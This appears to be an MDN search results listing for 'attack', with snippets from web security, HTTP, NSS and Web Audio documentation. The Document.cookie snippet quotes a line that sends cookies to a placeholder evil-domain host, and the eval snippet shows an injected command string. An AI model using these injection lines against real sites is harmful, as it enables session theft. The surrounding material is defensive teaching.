Search completed in 1.36 seconds.
Types of attacks - Web security
this article describes various types of security
attacks and techniques to mitigate them.
...(click-jacking is sometimes called "user interface redressing", though this is a misuse of the term "redress".) cross-site request forgery (csrf) cross-site scripting (xss) cross-site scripting (xss) is a security exploit which allows an
attacker to inject into a website malicious client-side code.
... this code is executed by the victims and lets the
attackers bypass access controls and impersonate users.
...And 12 more matches
DoS attack - MDN Web Docs Glossary: Definitions of Web-related terms
dos (denial of service) is a network
attack that prevents legitimate use of server resources by flooding the server with requests.
...a dos
attack consists of various techniques to exhaust these resources and make a server or a network unavailable to legitimate users, or at least make the server perform sluggishly.
... there are also distributed denial of service (ddos)
attacks in which a multitude of servers are used to exhaust the computing capacity of an
attacked computer.
...And 2 more matches
DynamicsCompressorNode.attack - Web APIs
the
attack property of the dynamicscompressornode interface is a k-rate audioparam representing the amount of time, in seconds, required to reduce the gain by 10 db.
... the
attack property's default value is 0.003 and it can be set between 0 and 1.
... syntax var audioctx = new audiocontext(); var compressor = audioctx.createdynamicscompressor(); compressor.
attack.value = 0; value an audioparam.
...And 2 more matches
Website security - Learn web development
this introductory article won't make you a website security guru, but it will help you understand where threats come from, and what you can do to harden your web application against the most common
attacks.
...with great regularity, we hear about websites becoming unavailable due to denial of service
attacks, or displaying modified (and often damaging) information on their homepages.
... the purpose of website security is to prevent these (or any) sorts of
attacks.
...And 26 more matches
Index - MDN Web Docs Glossary: Definitions of Web-related terms
53 csp glossary, http, infrastructure a csp (content security policy) is used to detect and mitigate certain types of website related
attacks like xss and data injections.
... 54 csrf glossary, security csrf (cross-site request forgery) is an
attack that impersonates a trusted user and sends a website unwanted commands.
...challenge-response protocols are one way to fight against replay
attacks where an
attacker listens to the previous messages and resends them at a later time to get the same credentials as the original message.
...And 10 more matches
HTTP Index - HTTP
16 content security policy (csp) csp, content security policy, reference, security content security policy (csp) is an added layer of security that helps to detect and mitigate certain types of
attacks, including cross site scripting (xss) and data injection
attacks.
... these
attacks are used for everything from data theft to site defacement to distribution of malware.
...this serves as an additional layer of protection above and beyond the same-origin policy which can mitigate speculative side channel
attacks as well as cross-site script inclusion
attacks.
...And 7 more matches
Mixed content - Web security
when a user visits a page served over https, their connection with the web server is encrypted with tls and is therefore safeguarded from most sniffers and man-in-the-middle
attacks.
...pages like this are only partially encrypted, leaving the unencrypted content accessible to sniffers and man-in-the-middle
attackers.
...the difference lies in the threat level of the worst case scenario if content is rewritten as part of a man-in-the-middle
attack.
...And 7 more matches
Subdomain takeovers - Web security
a subdomain takeover occurs when an
attacker gains control over a subdomain of a target domain.
...an
attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it.
... if an
attacker can do this, they can potentially read cookies set from the main domain, perform cross-site scripting, or circumvent content security policies, thereby enabling them to capture protected information (including logins) or send malicious content to unsuspecting users.
...And 7 more matches
Distributed Denial of Service - MDN Web Docs Glossary: Definitions of Web-related terms
a distributed denial-of-service (ddos) is an
attack in which many compromised systems are made to
attack a single target, in order to swamp server resources and block legitimate users.
... normally many persons, using many bots,
attack high-profile web servers like banks or credit-card payment gateways.
... in a typical ddos
attack, the assailant begins by exploiting a vulnerability in one computer system and making it the ddos master.
...And 5 more matches
sslfnc.html
ssl_rollback_detection disables detection of a rollback
attack.
...you must turn this option off to interoperate with tls clients ( such as certain versions of microsoft internet explorer) that do not conform to the tls specification regarding rollback
attacks.
... important: turning this option off means that your code will not comply with the tls 3.1 and ssl 3.0 specifications regarding rollback
attack and will therefore be vulnerable to this form of
attack.
...And 5 more matches
Web security
the web security-oriented articles listed here provide information that may help you secure your site and its code from
attacks and data theft.
... content security content security policy (csp) content security policy (csp) is an added layer of security that helps to detect and mitigate certain types of
attacks, including cross-site scripting (xss) and data injection
attacks.
... these
attacks are used for everything from data theft to site defacement to the distribution of malware.
...And 5 more matches
Content Security Policy (CSP) - HTTP
content security policy (csp) is an added layer of security that helps to detect and mitigate certain types of
attacks, including cross site scripting (xss) and data injection
attacks.
... these
attacks are used for everything from data theft to site defacement to distribution of malware.
...f the x-content-security-policy header, but that's an older version and you don't need to specify it anymore.) alternatively, the <meta> element can be used to configure a policy, for example: <meta http-equiv="content-security-policy" content="default-src 'self'; img-src https://*; child-src 'none';"> threats mitigating cross site scripting a primary goal of csp is to mitigate and report xss
attacks.
...And 4 more matches
From object to iframe — other embedding technologies - Learn web development
browser makers and web developers have learned the hard way that iframes are a common target (official term:
attack vector) for bad people on the web (often termed hackers, or more accurately, crackers) to
attack if they are trying to maliciously modify your webpage, or trick people into doing something they don't want to do, such as reveal sensitive information like usernames and passwords.
... clickjacking is one kind of common iframe
attack where hackers embed an invisible iframe into your document (or embed your document into their own malicious website) and use it to capture users' interactions.
... always use the sandbox attribute you want to give
attackers as little power as you can to do bad things on your website, therefore you should give embedded content only the permissions needed for doing its job.
...And 3 more matches
Using HTTP cookies - HTTP
this technique helps prevent session fixation
attacks, where a third party can reuse a user's session.
... a cookie with the secure attribute is sent to the server only with an encrypted request over the https protocol, never with unsecured http, and therefore can't easily be accessed by a man-in-the-middle
attacker.
...this precaution helps mitigate cross-site scripting (xss)
attacks.
...And 3 more matches
Threats - Archive of obsolete content
threats may involve intentional actors (e.g.,
attacker who wants to access information on a server) or unintentional actors (e.g., administrator who forgets to disable user accounts of a former employee.) threats can be local, such as a disgruntled employee, or remote, such as an
attacker in another geographical area.
... a threat source is the cause of a threat, such as a hostile cyber or physical
attack, a human error of omission or commission, a failure of organization-controlled hardware or software, or other failure beyond the control of the organization.
...the
attacks often comes in form of instant messages or phishing emails which appear to be legitimate but they are used to obtain personal information.
...And 2 more matches
Vulnerabilities - Archive of obsolete content
an example is an input validation error, such as user-provided input not being properly evaluated for malicious character strings and overly long values associated with known
attacks.
... another example is a race condition error that allows the
attacker to perform a specific action with elevated privileges.
...an
attacker could craft a fraudulent email message that contains hyperlinks that, when rendered in html, appear to the recipient to be benign but actually take the recipient to a malicious web site when they are clicked on.
...And 2 more matches
Denial of Service - MDN Web Docs Glossary: Definitions of Web-related terms
dos (denial of service) is a network
attack that prevents legitimate use of server resources by flooding the server with requests.
...a dos
attack consists of various techniques to exhaust these resources and make a server or a network unavailable to legitimate users, or at least make the server perform sluggishly.
... there are also distributed denial of service (ddos)
attacks in which a multitude of servers are used to exhaust the computing capacity of an
attacked computer.
...And 2 more matches
NSS 3.14.3 release notes
notable changes in nss 3.14.3 cve-2013-1620 recent research by nadhem alfardan and kenny patterson has highlighted a weakness in the handling of cbc padding as used in ssl, tls, and dtls that allows an
attacker to exploit timing differences in mac processing.
... the details of their research and the
attack can be found at http://www.isg.rhul.ac.uk/tls/, and has been referred to as "lucky thirteen".
... nss 3.14.3 includes changes to the softoken and ssl libraries to address and mitigate these
attacks, contributed by adam langley of google.
...And 2 more matches
Advanced techniques: Creating and sequencing audio - Web APIs
let's say our envelope has
attack and release.
... we can allow the user to control these using range inputs on the interface: <label for="
attack">
attack</label> <input name="
attack" id="
attack" type="range" min="0" max="1" value="0.2" step="0.1" /> <label for="release">release</label> <input name="release" id="release" type="range" min="0" max="1" value="0.5" step="0.1" /> now we can create some variables over in javascript and have them change when the input values are updated: let
attacktime = 0.2; const
attackcontrol = document.queryselector('#
attack');
attackcontrol.addeventlistener('input', function() {
attacktime = number(this.value); }, false); let releasetime = 0.5; const releasecontrol = document.queryselector('#release'); releasecontrol.addeventlistener('input', function() { releasetime = number(this.value); }, false); ...
... for our
attack and release, we'll use the linearramptovalueattime method as mentioned above.
...And 2 more matches
X-XSS-Protection - HTTP
the http x-xss-protection response header is a feature of internet explorer, chrome and safari that stops pages from loading when they detect reflected cross-site scripting (xss)
attacks.
...if a cross-site scripting
attack is detected, the browser will sanitize the page (remove the unsafe parts).
...rather than sanitizing the page, the browser will prevent rendering of the page if an
attack is detected.
...And 2 more matches
Securing your site - Web security
hash passwords using a secure algorithm (owasp) storing passwords in plain text can lead to
attackers knowing and leaking the exact password of your site's users, potentially putting the users at risk.
... content security policy an added layer of security that helps to detect and mitigate certain types of
attacks, including cross site scripting (xss) and data injection
attacks.
... these
attacks are used for everything from data theft to site defacement or distribution of malware.
...And 2 more matches
Security Controls - Archive of obsolete content
for example, if a system has a known vulnerability that
attackers could exploit, the system should be patched so that the vulnerability is removed or mitigated.
...limiting functionality and resolving security weaknesses have a common goal: give
attackers as few opportunities as possible to breach a system.
...think of phishing
attacks.
... for example, sensitive data on a server may be protected from external
attack by several controls, including a network-based firewall, a host-based firewall, and os patching.
Introduction to SSL - Archive of obsolete content
although the fourth question is not technically part of the ssl protocol, it is the client's responsibility to support this requirement, which provides some assurance of the server's identity and thus helps protect against a form of security
attack known as "man in the middle." an ssl-enabled client goes through these steps to authenticate a server's identity: is today's date within the validity period?
...although step 4 is not technically part of the ssl protocol, it provides the only protection against a form of security
attack known as "man in the middle." clients must perform this step and must refuse to authenticate the server or establish a connection if the domain names don't match.
... man-in-the-middle
attack as suggested in step 4 above, the client application must check the server domain name specified in the server certificate against the actual domain name of the server with which the client is attempting to communicate.
... this step is necessary to protect against a man-in-the-middle
attack, which works as follows.
Cross-site scripting - MDN Web Docs Glossary: Definitions of Web-related terms
cross-site scripting (xss) is a security exploit which allows an
attacker to inject into a website malicious client-side code.
... this code is executed by the victims and lets the
attackers bypass access controls and impersonate users.
... these
attacks succeed if the web app does not employ enough validation or encoding.
... learn more general knowledge cross-site scripting (xss) cross-site scripting on wikipedia cross-site scripting on owasp another article about cross-site scripting xss
attack – exploit & protection ...
Session Hijacking - MDN Web Docs Glossary: Definitions of Web-related terms
session hijacking occurs when an
attacker takes over a valid session between two computers.
... the
attacker steals a valid session id in order to break into the system and snoop data.
...in tcp session hijacking, an
attacker gains access by taking over a tcp session between two machines in mid session.
... session hijacking occurs because no account lockout for invalid session ids weak session-id generation algorithm insecure handling indefinite session expiration time short session ids transmission in plain text session hijacking process sniff, that is perform a man-in-the-middle (mitm)
attack, place yourself between victim and server.
Phishing: a short definition
this email will usually contain a link pretending to lead to the original service, but in reality, taking the victim to an
attacker-controlled website.
... past and current countermeasures various technical, and social approaches, exist to combat phishing
attacks.
...as most phishing
attacks start with unsolicited email messages, a clear starting point is improving spam filters, thus reducing the number of fraudulent messages reaching users.
...this can be phished by an
attacker, though with totp apps the
attacker has limited time to make their unauthorized login.
sslerr.html
if this occurs frequently on a server, an active
attack (such as the "million question"
attack) may be underway against the server.
...this may indicate that an
attack on that server is underway.
...if this occurs frequently on a server, an active
attack (such as the "million question"
attack) may be underway against the server.
...if encountered repeatedly on a server socket, this can indicate that the server is actively under a "million question"
attack.
Lighting a WebXR setting - Web APIs
decoupling orientation from lighting in an ar application that uses geolocation to determine orientation and potentially position information, avoiding having that information directly correlate to the state of the lighting is another way browsers can protect users from fingerprinting
attacks.
... temporal and spatial filtering consider an
attack that uses a building's automated lighting system to flash the lights on and off quickly in a known pattern.
...this could be done remotely, or it could be performed by an
attacker who's located in the same room but wants to determine if the other person is also in the same room.
... the lighting estimation api specification mandates that all user agents perform temporal and spatial filtering to fuzz the data in a manner that reduces its usefulness for the purpose of locating the user or performing side-channel
attacks.
Index - HTTP
this helps guard against cross-site scripting
attacks (xss).
... 91 public-key-pins hpkp, http, reference, security, header the http public-key-pins response header associates a specific cryptographic public key with a certain web server to decrease the risk of mitm
attacks with forged certificates.
...sites can use this to avoid clickjacking
attacks, by ensuring that their content is not embedded into other sites.
... 122 x-xss-protection http, reference, security, xss, header the http x-xss-protection response header is a feature of internet explorer, chrome and safari that stops pages from loading when they detect reflected cross-site scripting (xss)
attacks.
Index - Archive of obsolete content
for example, if a system has a known vulnerability that
attackers could exploit, the system should be patched so that the vulnerability is removed or mitigated.
...limiting functionality and resolving security weaknesses have a common goal: give
attackers as few opportunities as possible to breach a system.
...threats may involve intentional actors (e.g.,
attacker who wants to access information on a server) or unintentional actors (e.g., administrator who forgets to disable user accounts of a former employee.) threats can be local, such as a disgruntled employee, or remote, such as an
attacker in another geographical area.
Confidentiality, Integrity, and Availability - Archive of obsolete content
now imagine that an
attacker can shop on your web site and maliciously alter the prices of your products, so that they can buy anything for whatever price they choose.
...another example of a failure of integrity is when you try to connect to a website and a malicious
attacker between you and the website redirects your traffic to a different website.
...if an
attacker is not able to compromise the first two elements of information security (see above) they may try to execute
attacks like denial of service that would bring down the server, making the website unavailable to legitimate users due to lack of availability.
Encryption and Decryption - Archive of obsolete content
manually finding the key to break an algorithm is called a brute force
attack.
... the key strength of an algorithm is determined by finding the fastest method to break the algorithm and comparing it to a brute force
attack.
...(for more information about rc4 and other ciphers used with ssl, see "introduction to ssl.") an encryption key is considered full strength if the best known
attack to break the key is no faster than a brute force attempt to test every key possibility.
MitM - MDN Web Docs Glossary: Definitions of Web-related terms
a man-in-the-middle
attack (mitm) intercepts a communication between two systems.
... in physical mail and in online communication, mitm
attacks are tough to defend.
... learn more owasp article: man-in-the-middle
attack wikipedia: man-in-the-middle
attack the public-key-pins header (hpkp) can significantly decrease the risk of mitm by instructing browsers to require a whitelisted certificate for all subsequent connections to that website.
JSAPI User Guide
unless you also regularly deploy spidermonkey security updates, a determined hacker could use publicly known bugs in the engine to
attack your application.
... note that the kind of
attack we're talking about here is where a hacker uses javascript to
attack the c++ code of the engine itself (or your embedding).
... block simple denial-of-service
attacks - a program like while(true){} should not hang your application.
Secure Development Guidelines
asic registers (eax, ebx, ecx, edx, edi, esi) 2 stack-related registers (esp, ebp) mark top and bottom of current stack frame status register (eflags) contains various state information instruction pointer (eip) points to register being executed; can’t be modified directly introduction: gaining control (2) eip is modified using call or jump instructions
attacks usually rely on obtaining control over the eip otherwise the
attacker can try to control memory pointed to by an existing function pointer a vulnerability is required to modify the eip or sensitive memory saved return addr or function pointer get altered introduction: gaining control (3) common issues used to gain control buffer overflows format string bugs integer overflows/...
...ation most vulnerabilities are a result of un-validated input always perform input validation could save you without knowing it examples: if it doesn’t have to be negative, store it in an unsigned int if the input doesn’t have to be > 512, cut it off there if the input should only be [a-za-z0-9], enforce it cross site scripting (xss) xss is a type of code injection
attack typically occurs in web applications injection of arbitrary data into an html document from another site victim’s browser executes those html instructions could be used to steal user credentials think: webmail, online auction, cms, online banking...
... to the user html encoding & → & < → < > → > " → " ' → ' url encoding % encoding java/vbscript escaping depends on the context; in a single-quoted string, escaping ' would suffice sql injection occurs when un-trusted input is mixed with a sql string sql is a language used to interact with databases code injection
attack that is similar to xss but targeted at sql rather than html and javascript if input is mixed with sql, it could itself become an sql instruction and be used to: query data from the database (passwords) insert value into the database (a user account) change application logic based on results returned by the database sql injection: example snprintf(str, sizeof(str), "...
SubtleCrypto.encrypt() - Web APIs
the web crypto api supports three different aes modes: ctr (counter mode) cbc (cipher block chaining) gcm (galois/counter mode) it's strongly recommended to use authenticated encryption, which includes checks that the ciphertext has not been modified by an
attacker.
... authentication helps protect against chosen-ciphertext
attacks, in which an
attacker can ask the system to decrypt arbitrary messages, and use the result to deduce information about the secret key.
... one major difference between this mode and the others is that gcm is an "authenticated" mode, which means that it includes checks that the ciphertext has not been modified by an
attacker.
Strict-Transport-Security - HTTP
this creates an opportunity for a man-in-the-middle
attack.
... note: the strict-transport-security header is ignored by the browser when your site is accessed using http; this is because an
attacker may intercept http connections and inject the header or remove it.
... strict transport security resolves this problem; as long as you've accessed your bank's web site once using https, and the bank's web site uses strict transport security, your browser will know to automatically use only https, which prevents hackers from performing this sort of man-in-the-middle
attack.
Planned changes to shared memory - JavaScript
these changes provide further isolation between sites and help reduce the impact of
attacks with high-resolution timers, which can be created with shared memory.
... for top-level documents, two headers will need to be set: cross-origin-opener-policy with same-origin as value (protects your origin from
attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) with these two headers set, postmessage() will no longer throw for sharedarraybuffer objects and shared memory across threads is therefore available.
...note that setting the cross-origin-resource-policy header to any other value than same-origin opens up the resource to potential
attacks, such as spectre.
Privacy, permissions, and information security
modern browsers take steps to help prevent fingerprinting-based
attacks by either not allowing information to be accessed or, where the information must be made available, by introducing variations that prevent it from being used for identification purposes.
... certificate transparency an open standard for monitoring and auditing certificates, creating a database of public logs that can be used to help identify incorrect or malicious certificates content security policy provides the ability to define the extent to which a document's content can be accessed by other devices over the web; used in particular to prevent or mitigate
attacks on the server feature policy lets web developers selectively enable, disable, and modify the behavior of certain features and apis both for a document and for subdocuments loaded in <iframe>s <iframe>'s allow attribute technically part of feature policy, the allow attribute on an <iframe> specifies which web features the document in the frame should be allowed to access ...
... http public key pinning (hpkp) hpkp is used by servers to instruct a client to associate a specific public key with the server going forward in order to decrease the likelihood of man-in-the-middle
attacks http strict transport security (hsts) hsts is used by servers to let them protect themselves from protocol downgrade and cookie hijack
attacks by letting sites tell clients that they can only use https to communicate with the server http/2 while http/2 technically does not have to use encryption, most browser developers are only supporting it when used with https, so it can be thought of in that regard as being security-related permissions api provides a way to determine the status of permissions for the current browser context transport ...
Insecure passwords - Web security
serving login forms over http is especially dangerous because of the wide variety of
attacks that can be used against them to extract a user’s password.
...websites that handle user data should use https to protect their users from
attackers.
...
attackers are getting smarter; they steal username/password pairs from one site and then try reusing them on more lucrative sites.
Appendix C: Avoiding using eval in Add-ons - Archive of obsolete content
if using an unencrypted, insecure connection, a man-in-the-middle
attacker might replace the json with
attack code before it arrives at the user.
...settimeout("alert('" + xhr.responsetext + "');", 100); //
attacker manipulated responsetext to contain "
attack!'); format_computer(); alert('done" settimeout("alert('
attack!'); format_computer(); alert('done');", 100); as a general rule of thumb, just don't pass code around as strings and execute it by calling eval, settimeout and friends.
MDN Web Docs Glossary: Definitions of Web-related terms
descriptor (css) deserialization developer tools dhtml digest digital certificate distributed denial of service dmz dns doctype document directive document environment dom (document object model) domain domain name domain sharding dominator dos
attack dtls (datagram transport layer security) dtmf (dual-tone multi-frequency signaling) dynamic programming language dynamic typing e ecma ecmascript effective connection type element empty element encapsulation encryption endianness engine entity enti...
...webp webrtc websockets webvtt whatwg whitespace world wide web wrapper x xforms xhr (xmlhttprequest) xhtml xinclude xlink xml xpath xquery xslt other 404 502 alpn at-rule
attack byte-order mark character set client cryptosystem debug digital signature execution flex-direction glsl interface library memory management routers self-executing anonymous function stylesheet vector image ...
Sending form data - Learn web development
html forms are by far the most common server
attack vectors (places where
attacks can occur).
... the website security article of our server-side learning topic discusses a number of common
attacks and potential defences against them in detail.
Mozilla Port Blocking
background on 08/15/2001, cert issued a vulnerability note vu#476267 for a "cross-protocol" scripting
attack, known as the html form protocol
attack which allowed sending arbitrary data to most tcp ports.
... a simple exploit of this hole allows an
attacker to send forged unsigned mail through a mail server behind your firewall: a really nasty hole.
An overview of NSS Internals
often freeing is combined with immediately erasing (zeroing, zfree) the memory associated to the arena, in order to make it more difficult for
attackers to extract keys from a memory dump.
...as soon as you set a master password, an
attacker stealing your key database will no longer be able to get access to your private key, unless the
attacker would also succeed in stealing the master password.
Index
often freeing is combined with immediately erasing (zeroing, zfree) the memory associated to the arena, in order to make it more difficult for
attackers to extract keys from a memory dump.
...as soon as you set a master password, an
attacker stealing your key database will no longer be able to get access to your private key, unless the
attacker would also succeed in stealing the master password.
NSS 3.19.2.1 release notes
an
attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow
attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.19.4 release notes
an
attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow
attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.20.1 release notes
an
attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow
attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.24 release notes
update nss to protect it against the cachebleed
attack.
... bugs fixed in nss 3.24 this bugzilla query returns all the bugs fixed in nss 3.24: https://bugzilla.mozilla.org/buglist.cgi?resolution=fixed&classification=components&query_format=advanced&product=nss&target_milestone=3.24 acknowledgements the nss development team would like to thank yuval yarom for responsibly disclosing the cachebleed
attack by providing advance copies of their research.
JS::CompileOptions
this allows an
attack by which a malicious website loads a sensitive file (say, a bank statement) cross-origin (using the user's cookies), and sniffs the generated syntax errors (via a window.onerror handler) for juicy morsels of its contents.
... to counter this
attack, html5 specifies that script errors should be sanitized ("muted") when the script is not same-origin with the global for which it is loaded.
JSErrorReport
this allows an
attack by which a malicious website loads a sensitive file (say, a bank statement) cross-origin (using the user's cookies), and sniffs the generated syntax errors (via a window.onerror handler) for juicy morsels of its contents.
... to counter this
attack, html5 specifies that script errors should be sanitized ("muted") when the script is not same-origin with the global for which it is loaded.
Handling Mozilla Security Bugs
background security vulnerabilities are different from other bugs, because their consequences are potentially so severe: users' private information (including financial information) could be exposed, users' data could be destroyed, and users' systems could be used as platforms for
attacks on other systems.
...we understand and acknowledge the concerns of those who believe that too-hasty disclosure of exploit details can provide a short-term advantage to potential
attackers, who can exploit a problem before most end users become aware of its existence.
Xray vision
if chrome-privileged code is compromised, the
attacker can take over the user's computer.
...so this is not a straightforward privilege escalation
attack, although it might lead to one if the chrome code is sufficiently confused.
Mozilla
mozilla port blocking on 08/15/2001, cert issued a vulnerability note vu#476267 for a "cross-protocol" scripting
attack, known as the html form protocol
attack which allowed sending arbitrary data to most tcp ports.
... a simple exploit of this hole allows an
attacker to send forged unsigned mail through a mail server behind your firewall: a really nasty hole.
DOMHighResTimeStamp - Web APIs
also note the section below on reduced time precision controlled by browser preferences to avoid timing
attacks and fingerprinting.
... reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of time stamps might get rounded depending on browser settings.
Document.cookie - Web APIs
this is sufficient for user tracking, but it will prevent many csrf
attacks.
...common ways to steal cookies include using social engineering or by exploiting an xss vulnerability in the application - (new image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie; the httponly cookie attribute can help to mitigate this
attack by preventing access to cookie value through javascript.
DynamicsCompressorNode - Web APIs
dynamicscompressornode.
attack read only is a k-rate audioparam representing the amount of time, in seconds, required to reduce the gain by 10 db.
... a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.
attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
Element.innerHTML - Web APIs
there is potential for this to become an
attack vector on a site, creating a potential security risk.
... name = "<script>alert('i am john in an annoying alert!')</script>"; el.innerhtml = name; // harmless in this case although this may look like a cross-site scripting
attack, the result is harmless.
Index - Web APIs
1057 dynamicscompressornode() audio, constructor, dynamicscompressornode, media, web audio api the dynamicscompressornode() constructor creates a new dynamicscompressornode object which provides a compression effect, which lowers the volume of the loudest parts of the signal 1058 dynamicscompressornode.
attack api,
attack, dynamicscompressornode, property, reference, web audio api an audioparam.
...although the window.crypto property itself is read-only, all of its methods (and the methods of its child object, subtlecrypto) are not read-only, and therefore vulnerable to
attack by polyfill.
performance.now() - Web APIs
reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of performance.now() might get rounded depending on browser settings.
...coop process-isolates your document and potential
attackers can't access to your global object if they were opening it in a popup, preventing a set of cross-origin
attacks dubbed xs-leaks.
window.postMessage() - Web APIs
shared memory is gated behind two http headers: cross-origin-opener-policy with same-origin as value (protects your origin from
attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) cross-origin-opener-policy: same-origin cross-origin-embedder-policy: require-corp to check if cross origin isolation has been successful, you can test against the crossoriginisolated property available to window and worker contexts: if (crossoriginisolated) { // post sharedarraybuffer } else {...
...this cannot be overstated: failure to check the origin and possibly source properties enables cross-site scripting
attacks.
Set-Cookie - HTTP
this mitigates
attacks against cross-site scripting (xss).
... asserts that a cookie must not be sent with cross-origin requests, providing some protection against cross-site request forgery
attacks (csrf).
HTTP headers - HTTP
x-download-options the x-download-options http header indicates that the browser (internet explorer) should not display the option to "open" a file that has been downloaded from an application, to prevent phishing
attacks as the file otherwise would gain access to execute in the context of the application.
... public-key-pins associates a specific cryptographic public key with a certain web server to decrease the risk of mitm
attacks with forged certificates.
HTTP Public Key Pinning (HPKP) - HTTP
http public key pinning (hpkp) was a security feature that used to tell a web client to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm
attacks with forged certificates.
...if an
attacker is able to compromise a single ca, they can perform mitm
attacks on various tls connections.
Secure contexts - Web security
the primary goal of secure contexts is to prevent mitm
attackers from accessing powerful apis that could further compromise the victim of an
attack.
... some apis on the web are very powerful, giving an
attacker the ability to do the following and more: invade a user's privacy.
Subresource Integrity - Web security
however, using cdns also comes with a risk, in that if an
attacker gains control of a cdn, the
attacker can inject arbitrary malicious content into files on the cdn (or replace the files completely) and thus can also potentially
attack all sites that fetch files from that cdn.
... subresource integrity enables you to mitigate some risks of
attacks such as this, by ensuring that the files your web application or web document fetches (from a cdn or anywhere) have been delivered without a third-party having injected any additional content into those files — and without any other changes of any kind at all having been made to those files.
Transport Layer Security - Web security
though the performance gains from 0-rtt can be significant, they come with some risk of replay
attack, so some care is needed before enabling this feature.
...enabling 0-rtt requires additional steps, both to ensure successful deployment and to manage the risks of replay
attacks.
Weak signature algorithms - Web security
weaknesses in hash algorithms can lead to situations in which
attackers can create or obtain fraudulent certificates.
... as new
attacks are found and improvements in available technology make
attacks more feasible, the use of older algorithms is discouraged and support for them is eventually removed.
Security best practices in extensions - Archive of obsolete content
non-chrome urls in chrome xul or html such as the following example are not allowed: <script type="text/javascript" src="http://mysite.greatsite.com/js/wow-content.js" /> in general, scripts that are from remote sources that run in the chrome context are not acceptable, as many times the source of the script can never be 100% guaranteed, and they are vulnerable to man-in-the-middle
attacks.
XUL Questions and Answers - Archive of obsolete content
support for non-rdf datasources for xul template is planned (bug 321170): xml datasources (bug 321171) storage (sqlite) datasources (bug 321172) when loading an xslt stylesheet into an xml i get the error: "error loading stylesheet: an xslt stylesheet load was blocked for security reasons." that error is from a security check that has been put up to safeguard against cross-site-scripting
attacks.
Introduction to Public-Key Cryptography - Archive of obsolete content
for an overview of ssl, see "introduction to ssl." for an overview of encryption and decryption, see "encryption and decryption." information on digital signatures is available from "digital signatures." public-key cryptography is a set of well-established techniques and standards for protecting communications from eavesdropping, tampering, and impersonation
attacks.
Cryptographic hash function - MDN Web Docs Glossary: Definitions of Web-related terms
tible (each digest could come from a very large number of messages, and only brute-force can generate a message that leads to a given digest) tamper-resistant (any change to a message leads to a different digest) collision-resistant (it should be impossible to find two different messages that produce the same digest) cryptographic hash functions such as md5 and sha-1 are considered broken, as
attacks have been found that significantly reduce their collision resistance.
Placeholder names - MDN Web Docs Glossary: Definitions of Web-related terms
placeholder names are commonly used in cryptography to indicate the participants in a conversation, without resorting to terminology such as "party a," "eavesdropper," and "malicious
attacker." the most commonly used names are: alice and bob, two parties who want to send messages to each other, occasionally joined by carol, a third participant eve, a passive
attacker who is eavesdropping on alice and bob's conversation mallory, an active
attacker ("man-in-the-middle") who is able to modify their conversation and replay old messages ...
Experimental features in Firefox
nightly 81 yes developer edition — — beta — — release — — preference name — security and privacy block plain text requests from flash on encrypted pages in order to help mitigate man-in-the-middle (mitm)
attacks caused by flash content on encrypted pages, a preference has been added to treat object_subrequests as active content.
Script security
if the code is compromised, the
attacker can take over the user's computer.
Localization content best practices
example: this web page at <span id='malware_sitename'/> has been reported as an
attack page and has been blocked based on your security preferences.
Gecko Profiler FAQ
you’ll probably want to accumulate costs that are somehow “similar” or “in the same bucket” but distributed over different parts of the call tree / time line, and then
attack the biggest bucket.
NSS FAQ
it contains bugs that were never fixed, doesn't support tls or or the new 56-bit export cipher suites, and does not contain the fix to the bleichenbacher
attack on pkcs#1.
NSS 3.12.5 release_notes
bug 525056: timing
attack against ssl3ext.c:ssl3_serverhandlesessionticketxtn() bug 526689: ssl3 & tls renegotiation vulnerability documentation for a list of the primary nss documentation pages on mozilla.org, see nss documentation.
NSS 3.19.2.3 release notes
an
attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.21.1 release notes
an
attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.22.2 release notes
an
attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.23 release notes
an
attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.36.6 release notes
this is a patch release to fix cve-2018-12404 bugs fixed in nss 3.36.6 bug 1485864 - cache side-channel variant of the bleichenbacher
attack (cve-2018-12404) bug 1389967 and bug 1448748 - fixes for mingw on x64 platforms.
NSS 3.40.1 release notes
this is a patch release to fix cve-2018-12404 new functions none bugs fixed in nss 3.40.1 bug 1485864 - cache side-channel variant of the bleichenbacher
attack (cve-2018-12404) compatibility nss 3.40.1 shared libraries are backward compatible with all older nss 3.x shared libraries.
NSS 3.41 release notes
gerprint: 27995829fe6a7515c1bfe848f9c4761db16c225929257bf40d0894f29ea8baf2 cn = opentrust root ca g3 sha-256 fingerprint: b7c36231706e81078c367cb896198f1e3208dd926949dd8f5709a410f75b6292 bugs fixed in nss 3.41 bug 1412829, reject empty supported_signature_algorithms in certificate request in tls 1.2 bug 1485864 - cache side-channel variant of the bleichenbacher
